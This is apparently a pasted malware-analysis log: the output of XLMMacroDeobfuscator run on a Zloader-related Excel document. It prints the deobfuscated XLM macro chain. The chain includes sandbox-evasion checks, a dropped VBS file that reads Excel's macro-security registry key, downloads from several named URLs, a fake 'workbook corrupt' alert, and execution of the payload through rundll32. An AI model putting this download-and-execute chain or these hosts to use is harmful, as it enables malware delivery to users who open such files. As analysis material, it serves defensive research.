dissectmalware

Zloader

Jun 26th, 2020
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\inf.4669.xls\inf.4669.xls
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\inf.4669.xls\inf.4669.xls
  24.  
  25. Unencrypted xls file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->'VyNand2egLwRTDtMIW'!$BH$12271
  29. [Starting Deobfuscation]
  30. CELL:BH12271 , FullEvaluation , FORMULA("=CHAR(R[29606]C[-87])",VyNand2egLwRTDtMIW$FH$5452:$FH$5532)
  31. CELL:BH12272 , FullEvaluation , "=FORMULA(R[37662]C[104],R[7636]C[31])"
  32. CELL:BH12273 , FullEvaluation , "=FORMULA(R[-12942]C[63],R[4358]C[-58])"
  33. CELL:BH12274 , FullEvaluation , "=FORMULA(R[-16395]C[73],R[5082]C[-38])"
  34. CELL:BH12275 , FullEvaluation , ON.TIME(2020-06-26 11:40:51.991544,'VyNand2egLwRTDtMIW'!IG48282)
  35. CELL:IG48282 , FullEvaluation , "=CLOSE(FALSE)"
  36. CELL:IG48283 , FullEvaluation , "=APP.MAXIMIZE()"
  37. CELL:IG48284 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R18256C168),)"
  38. CELL:IG48285 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R18256C168))"
  39. CELL:IG48286 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R18256C168),)"
  40. CELL:IG48287 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R18256C168),)"
  41. CELL:IG48288 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)"
  42. CELL:IG48289 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)"
  43. CELL:IG48290 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R18256C168))"
  44. CELL:IG48291 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R18256C168))"
  45. CELL:IG48292 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R18256C168))"
  46. CELL:IG48293 , FullEvaluation , "=""C:\Users\Public\qyUV.vbs"""
  47. CELL:IG48294 , FullEvaluation , "=""C:\Users\Public\gzGD.txt"""
  48. CELL:IG48295 , FullEvaluation , "=FOPEN(R18267C168,3)"
  49. CELL:IG48296 , FullEvaluation , "=FWRITELN(R18269C168,""On Error Resume Next"")"
  50. CELL:IG48297 , FullEvaluation , "=FWRITELN(R18269C168,""Set VFYjmh = CreateObject(""""WScript.Shell"""")"")"
  51. CELL:IG48298 , FullEvaluation , "=FWRITELN(R18269C168,""Set Yt1jI = CreateObject(""""Scripting.FileSystemObject"""")"")"
  52. CELL:IG48299 , FullEvaluation , "=FWRITELN(R18269C168,""Set BIj = Yt1jI.CreateTextFile(""""""&R18268C168&"""""", True)"")"
  53. CELL:IG48300 , FullEvaluation , "=FWRITELN(R18269C168,""BIj.WriteLine(VFYjmh.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  54. CELL:IG48301 , FullEvaluation , "=FWRITELN(R18269C168,""BIj.Close"")"
  55. CELL:IG48302 , FullEvaluation , "=FCLOSE(R18269C168)"
  56. CELL:IG48303 , FullEvaluation , "=EXEC(""explorer.exe ""&R18267C168&"""")"
  57. CELL:IG48304 , FullEvaluation , "=WHILE(ISERROR(FILES(R18268C168)))"
  58. CELL:IG48305 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  59. CELL:IG48306 , FullEvaluation , "=NEXT()"
  60. CELL:IG48307 , FullEvaluation , "=FILE.DELETE(R18267C168)"
  61. CELL:IG48308 , FullEvaluation , "=FOPEN(R18268C168,2)"
  62. CELL:IG48309 , FullEvaluation , "=FREAD(R18282C168,100)"
  63. CELL:IG48310 , FullEvaluation , "=FCLOSE(R18282C168)"
  64. CELL:IG48311 , FullEvaluation , "=FILE.DELETE(R18268C168)"
  65. CELL:IG48312 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R18283C168)),GOTO(R18256C168),)"
  66. CELL:IG48313 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))"
  67. CELL:IG48314 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.134456,'VyNand2egLwRTDtMIW'!EG10619)
  68. CELL:EG10619 , FullEvaluation , FORMULA("=FORMULA(R[37662]C[104],R[7636]C[31])",VyNand2egLwRTDtMIW$EG$10620:$EG$10651)
  69. CELL:EG10620 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[7636]C[31])
  70. CELL:EG10621 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[7636]C[31])
  71. CELL:EG10622 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R18256C168),)",R[7636]C[31])
  72. CELL:EG10623 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R18256C168))",R[7636]C[31])
  73. CELL:EG10624 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R18256C168),)",R[7636]C[31])
  74. CELL:EG10625 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R18256C168),)",R[7636]C[31])
  75. CELL:EG10626 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)",R[7636]C[31])
  76. CELL:EG10627 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)",R[7636]C[31])
  77. CELL:EG10628 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R18256C168))",R[7636]C[31])
  78. CELL:EG10629 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R18256C168))",R[7636]C[31])
  79. CELL:EG10630 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R18256C168))",R[7636]C[31])
  80. CELL:EG10631 , FullEvaluation , FORMULA("=""C:\Users\Public\qyUV.vbs""",R[7636]C[31])
  81. CELL:EG10632 , FullEvaluation , FORMULA("=""C:\Users\Public\gzGD.txt""",R[7636]C[31])
  82. CELL:EG10633 , FullEvaluation , FORMULA("=FOPEN(R18267C168,3)",R[7636]C[31])
  83. CELL:EG10634 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""On Error Resume Next"")",R[7636]C[31])
  84. CELL:EG10635 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set VFYjmh = CreateObject(""""WScript.Shell"""")"")",R[7636]C[31])
  85. CELL:EG10636 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set Yt1jI = CreateObject(""""Scripting.FileSystemObject"""")"")",R[7636]C[31])
  86. CELL:EG10637 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set BIj = Yt1jI.CreateTextFile(""""""&R18268C168&"""""", True)"")",R[7636]C[31])
  87. CELL:EG10638 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""BIj.WriteLine(VFYjmh.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[7636]C[31])
  88. CELL:EG10639 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""BIj.Close"")",R[7636]C[31])
  89. CELL:EG10640 , FullEvaluation , FORMULA("=FCLOSE(R18269C168)",R[7636]C[31])
  90. CELL:EG10641 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R18267C168&"""")",R[7636]C[31])
  91. CELL:EG10642 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R18268C168)))",R[7636]C[31])
  92. CELL:EG10643 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[7636]C[31])
  93. CELL:EG10644 , FullEvaluation , FORMULA("=NEXT()",R[7636]C[31])
  94. CELL:EG10645 , FullEvaluation , FORMULA("=FILE.DELETE(R18267C168)",R[7636]C[31])
  95. CELL:EG10646 , FullEvaluation , FORMULA("=FOPEN(R18268C168,2)",R[7636]C[31])
  96. CELL:EG10647 , FullEvaluation , FORMULA("=FREAD(R18282C168,100)",R[7636]C[31])
  97. CELL:EG10648 , FullEvaluation , FORMULA("=FCLOSE(R18282C168)",R[7636]C[31])
  98. CELL:EG10649 , FullEvaluation , FORMULA("=FILE.DELETE(R18268C168)",R[7636]C[31])
  99. CELL:EG10650 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R18283C168)),GOTO(R18256C168),)",R[7636]C[31])
  100. CELL:EG10651 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))",R[7636]C[31])
  101. CELL:EG10652 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.145446,'VyNand2egLwRTDtMIW'!FL18257)
  102. CELL:FL18257 , PartialEvaluation , APP.MAXIMIZE()
  103. CELL:FL18258 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R18256C168),)
  104. CELL:FL18259 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R18256C168))
  105. CELL:FL18260 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R18256C168),)
  106. CELL:FL18261 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R18256C168),)
  107. CELL:FL18262 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)
  108. CELL:FL18263 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)
  109. CELL:FL18264 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R18256C168))
  110. CELL:FL18265 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R18256C168))
  111. CELL:FL18266 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R18256C168))
  112. CELL:FL18266 , FullEvaluation , [TRUE]
  113. CELL:FL18267 , FullEvaluation , "C:\Users\Public\qyUV.vbs"
  114. CELL:FL18268 , FullEvaluation , "C:\Users\Public\gzGD.txt"
  115. CELL:FL18269 , FullEvaluation , FOPEN("C:\Users\Public\qyUV.vbs",3)
  116. CELL:FL18270 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","On Error Resume Next")
  117. CELL:FL18271 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set VFYjmh = CreateObject(""WScript.Shell"")")
  118. CELL:FL18272 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set Yt1jI = CreateObject(""Scripting.FileSystemObject"")")
  119. CELL:FL18273 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set BIj = Yt1jI.CreateTextFile(""C:\Users\Public\gzGD.txt"", True)")
  120. CELL:FL18274 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","BIj.WriteLine(VFYjmh.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  121. CELL:FL18275 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","BIj.Close")
  122. CELL:FL18276 , PartialEvaluation , FCLOSE("C:\Users\Public\qyUV.vbs")
  123. CELL:FL18277 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\qyUV.vbs")
  124. CELL:FL18278 , PartialEvaluation , WHILE(ISERROR(FILES(R18268C168)))
  125. CELL:FL18281 , PartialEvaluation , FILE.DELETE("C:\Users\Public\qyUV.vbs")
  126. CELL:FL18282 , FullEvaluation , FOPEN("C:\Users\Public\gzGD.txt",2)
  127. CELL:FL18283 , PartialEvaluation , FREAD("C:\Users\Public\gzGD.txt",100)
  128. CELL:FL18284 , PartialEvaluation , FCLOSE("C:\Users\Public\gzGD.txt")
  129. CELL:FL18285 , PartialEvaluation , FILE.DELETE("C:\Users\Public\gzGD.txt")
  130. CELL:FL18286 , FullBranching , IF(ISNUMBER(SEARCH("1",R18283C168)),GOTO(R18256C168),)
  131. CELL:FL18286 , FullEvaluation , [TRUE] GOTO(R18256C168)
  132. CELL:FL18256 , End , CLOSE(FALSE)
  133. CELL:FL18286 , FullEvaluation , [FALSE]
  134. CELL:FL18287 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))
  135. CELL:FL18287 , FullEvaluation , [TRUE] GOTO(R39084C183)
  136. CELL:GA39084 , FullEvaluation , "=""C:\Users\Public\OwP8Hxu4.html"""
  137. CELL:GA39085 , FullEvaluation , "=""https://estudiolacazezancarini.com/wp-crunch.php"""
  138. CELL:GA39086 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56385C62,R56384C62,0,0)"
  139. CELL:GA39087 , FullEvaluation , "=FILES(R56384C62)"
  140. CELL:GA39088 , FullEvaluation , "=IF(ISERROR(R56387C62),GOTO(R56394C62),)"
  141. CELL:GA39089 , FullEvaluation , "=FOPEN(R56384C62)"
  142. CELL:GA39090 , FullEvaluation , "=FSIZE(R56389C62)"
  143. CELL:GA39091 , FullEvaluation , "=FCLOSE(R56389C62)"
  144. CELL:GA39092 , FullEvaluation , "=IF(R56390C62<40000,,GOTO(R56411C62))"
  145. CELL:GA39093 , FullEvaluation , "=""https://germdisruptor.com/wp-crunch.php"""
  146. CELL:GA39094 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56393C62,R56384C62,0,0)"
  147. CELL:GA39095 , FullEvaluation , "=FILES(R56384C62)"
  148. CELL:GA39096 , FullEvaluation , "=IF(ISERROR(R56395C62),GOTO(R56402C62),)"
  149. CELL:GA39097 , FullEvaluation , "=FOPEN(R56384C62)"
  150. CELL:GA39098 , FullEvaluation , "=FSIZE(R56397C62)"
  151. CELL:GA39099 , FullEvaluation , "=FCLOSE(R56397C62)"
  152. CELL:GA39100 , FullEvaluation , "=IF(R56398C62<40000,,GOTO(R56411C62))"
  153. CELL:GA39101 , FullEvaluation , "=""https://gurukal.in/wp-crunch.php"""
  154. CELL:GA39102 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56401C62,R56384C62,0,0)"
  155. CELL:GA39103 , FullEvaluation , "=FILES(R56384C62)"
  156. CELL:GA39104 , FullEvaluation , "=IF(ISERROR(R56403C62),GOTO(R56410C62),)"
  157. CELL:GA39105 , FullEvaluation , "=FOPEN(R56384C62)"
  158. CELL:GA39106 , FullEvaluation , "=FSIZE(R56405C62)"
  159. CELL:GA39107 , FullEvaluation , "=FCLOSE(R56405C62)"
  160. CELL:GA39108 , FullEvaluation , "=IF(R56406C62<40000,,GOTO(R56411C62))"
  161. CELL:GA39109 , FullEvaluation , "=""https://indoeducation.com/wp-crunch.php"""
  162. CELL:GA39110 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56409C62,R56384C62,0,0)"
  163. CELL:GA39111 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  164. CELL:GA39112 , FullEvaluation , "=ALERT(R56411C62)"
  165. CELL:GA39113 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  166. CELL:GA39114 , FullEvaluation , "=R56384C62&"",DllRegisterServer"""
  167. CELL:GA39115 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R56413C62,R56414C62,0,5)"
  168. CELL:GA39116 , FullEvaluation , "=GOTO(R18256C168)"
  169. CELL:GA39117 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.343324,'VyNand2egLwRTDtMIW'!DP52025)
  170. CELL:DP52025 , FullEvaluation , FORMULA("=FORMULA(R[-12942]C[63],R[4358]C[-58])",VyNand2egLwRTDtMIW$DP$52026:$DP$52058)
  171. CELL:DP52026 , FullEvaluation , FORMULA("=""C:\Users\Public\OwP8Hxu4.html""",R[4358]C[-58])
  172. CELL:DP52027 , FullEvaluation , FORMULA("=""https://estudiolacazezancarini.com/wp-crunch.php""",R[4358]C[-58])
  173. CELL:DP52028 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56385C62,R56384C62,0,0)",R[4358]C[-58])
  174. CELL:DP52029 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
  175. CELL:DP52030 , FullEvaluation , FORMULA("=IF(ISERROR(R56387C62),GOTO(R56394C62),)",R[4358]C[-58])
  176. CELL:DP52031 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
  177. CELL:DP52032 , FullEvaluation , FORMULA("=FSIZE(R56389C62)",R[4358]C[-58])
  178. CELL:DP52033 , FullEvaluation , FORMULA("=FCLOSE(R56389C62)",R[4358]C[-58])
  179. CELL:DP52034 , FullEvaluation , FORMULA("=IF(R56390C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
  180. CELL:DP52035 , FullEvaluation , FORMULA("=""https://germdisruptor.com/wp-crunch.php""",R[4358]C[-58])
  181. CELL:DP52036 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56393C62,R56384C62,0,0)",R[4358]C[-58])
  182. CELL:DP52037 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
  183. CELL:DP52038 , FullEvaluation , FORMULA("=IF(ISERROR(R56395C62),GOTO(R56402C62),)",R[4358]C[-58])
  184. CELL:DP52039 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
  185. CELL:DP52040 , FullEvaluation , FORMULA("=FSIZE(R56397C62)",R[4358]C[-58])
  186. CELL:DP52041 , FullEvaluation , FORMULA("=FCLOSE(R56397C62)",R[4358]C[-58])
  187. CELL:DP52042 , FullEvaluation , FORMULA("=IF(R56398C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
  188. CELL:DP52043 , FullEvaluation , FORMULA("=""https://gurukal.in/wp-crunch.php""",R[4358]C[-58])
  189. CELL:DP52044 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56401C62,R56384C62,0,0)",R[4358]C[-58])
  190. CELL:DP52045 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
  191. CELL:DP52046 , FullEvaluation , FORMULA("=IF(ISERROR(R56403C62),GOTO(R56410C62),)",R[4358]C[-58])
  192. CELL:DP52047 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
  193. CELL:DP52048 , FullEvaluation , FORMULA("=FSIZE(R56405C62)",R[4358]C[-58])
  194. CELL:DP52049 , FullEvaluation , FORMULA("=FCLOSE(R56405C62)",R[4358]C[-58])
  195. CELL:DP52050 , FullEvaluation , FORMULA("=IF(R56406C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
  196. CELL:DP52051 , FullEvaluation , FORMULA("=""https://indoeducation.com/wp-crunch.php""",R[4358]C[-58])
  197. CELL:DP52052 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56409C62,R56384C62,0,0)",R[4358]C[-58])
  198. CELL:DP52053 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[4358]C[-58])
  199. CELL:DP52054 , FullEvaluation , FORMULA("=ALERT(R56411C62)",R[4358]C[-58])
  200. CELL:DP52055 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[4358]C[-58])
  201. CELL:DP52056 , FullEvaluation , FORMULA("=R56384C62&"",DllRegisterServer""",R[4358]C[-58])
  202. CELL:DP52057 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R56413C62,R56414C62,0,5)",R[4358]C[-58])
  203. CELL:DP52058 , FullEvaluation , FORMULA("=GOTO(R18256C168)",R[4358]C[-58])
  204. CELL:DP52059 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.355318,'VyNand2egLwRTDtMIW'!BJ56384)
  205. CELL:BJ56384 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html"
  206. CELL:BJ56385 , FullEvaluation , "https://estudiolacazezancarini.com/wp-crunch.php"
  207. CELL:BJ56386 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://estudiolacazezancarini.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  208. CELL:BJ56387 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  209. CELL:BJ56388 , FullBranching , IF(ISERROR(R56387C62),GOTO(R56394C62),)
  210. CELL:BJ56388 , FullEvaluation , [TRUE] GOTO(R56394C62)
  211. CELL:BJ56394 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://germdisruptor.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  212. CELL:BJ56395 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  213. CELL:BJ56396 , FullBranching , IF(ISERROR(R56395C62),GOTO(R56402C62),)
  214. CELL:BJ56396 , FullEvaluation , [TRUE] GOTO(R56402C62)
  215. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  216. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  217. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  218. CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
  219. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  220. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  221. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  222. CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  223. CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
  224. CELL:BJ56415 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\OwP8Hxu4.html,DllRegisterServer",0,5)
  225. CELL:BJ56416 , FullEvaluation , GOTO(R18256C168)
  226. CELL:FL18256 , End , CLOSE(FALSE)
  227. CELL:BJ56404 , FullEvaluation , [FALSE]
  228. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  229. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  230. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  231. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  232. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  233. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  234. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  235. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  236. CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  237. CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
  238. CELL:BJ56415 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\OwP8Hxu4.html,DllRegisterServer",0,5)
  239. CELL:BJ56416 , FullEvaluation , GOTO(R18256C168)
  240. CELL:FL18256 , End , CLOSE(FALSE)
  241. CELL:BJ56396 , FullEvaluation , [FALSE]
  242. CELL:BJ56397 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  243. CELL:BJ56398 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  244. CELL:BJ56399 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  245. CELL:BJ56400 , FullEvaluation , IF(R56398C62<40000,,GOTO(R56411C62))
  246. CELL:BJ56401 , FullEvaluation , "https://gurukal.in/wp-crunch.php"
  247. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  248. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  249. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  250. CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
  251. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  252. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  253. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  254. CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  255. CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
  256. CELL:BJ56404 , FullEvaluation , [FALSE]
  257. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  258. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  259. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  260. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  261. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  262. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  263. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  264. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  265. CELL:BJ56388 , FullEvaluation , [FALSE]
  266. CELL:BJ56389 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  267. CELL:BJ56390 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  268. CELL:BJ56391 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  269. CELL:BJ56392 , FullEvaluation , IF(R56390C62<40000,,GOTO(R56411C62))
  270. CELL:BJ56393 , FullEvaluation , "https://germdisruptor.com/wp-crunch.php"
  271. CELL:BJ56394 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://germdisruptor.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  272. CELL:BJ56395 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  273. CELL:BJ56396 , FullBranching , IF(ISERROR(R56395C62),GOTO(R56402C62),)
  274. CELL:BJ56396 , FullEvaluation , [TRUE] GOTO(R56402C62)
  275. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  276. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  277. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  278. CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
